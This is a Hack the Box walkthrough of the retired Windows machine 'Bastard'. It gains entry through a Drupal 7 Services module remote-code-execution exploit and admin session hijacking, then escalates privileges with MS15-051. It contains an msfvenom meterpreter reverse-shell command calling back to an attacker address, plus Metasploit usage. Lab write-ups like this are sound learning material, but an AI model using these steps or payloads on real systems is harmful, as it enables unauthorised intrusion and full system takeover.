Hack the Box – Bastard Walkthrough

Today we’re going to solve another CTF machine “Bastard”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

• Target OS: Windows
• Services: HTTP, msrpc, unkown
• IP Address: 10.10.10.9
• Difficulty: Medium

Weakness

• Exploit-DB 41564
• MS15-051

Contents

• Getting user
• Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

Enumerate Drupal

Drupal is running on http and nmap gave us some information we need to check.

80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC

Before everything we have to check which version of drupal is install. We need to check CHANGLOG.txt to find more details.

In that case we have Drupal 7.54 installed let’s searchsploit.

The exploit which we’re gonna use is “Drupal 7.x Module Services – Remote Code Execution” 

We need to modify our exploit. The exploit needs rest api path which we found in our directory enumeration so we set our endpoint path to /rest.

$url = 'http://10.10.10.9';                                                                                                                                     
$endpoint_path = '/rest';

By running this exploit we got two files user.json and session.json.

There’s two ways to get reverse shell.

Reverse Shell Using Drupal

We can use sessions.txt data to login as administrator which we got through running exploit.

sessions.txt

{
    "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
    "session_id": "li1-xoDBXCgxKg0rI9tn3pS6CsfJaQKwEjARmfxlxa0",
    "token": "2dnjgeee6Cy5hRPikPeogGjbxqqgdKeyEo2v32d-jEU"
}

Now let’s go to http://10.10.10.9/admin

Cookie: has_js=1; Drupal.toolbar.collapsed=0

We have to modify the cookie in this format.

Cookie: session_name=session_id;token

Once you have access to administration panel go to Modules and enable PHP filter so we can get reverse shell.

You can get user.txt file from C:\Users\dimitris\Desktop directory.

Privilege Escalation

Now we have user access we have to use exploit suggester module in order to obtain more information regarding the box.

We have a user session via php shell let’s switch to actual reverse shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=1338 -f exe > shell.exe

Now simply upload and run shell.exe

Now we got a proper reverse shell.

By using exploit suggester we got few exploits which i tested and one of them worked.

use exploit/windows/local/ms15_051_client_copy_image 

And we are NT Authority.

We can obtain root.txt from here: C:\Users\Administrator\Desktop\root.txt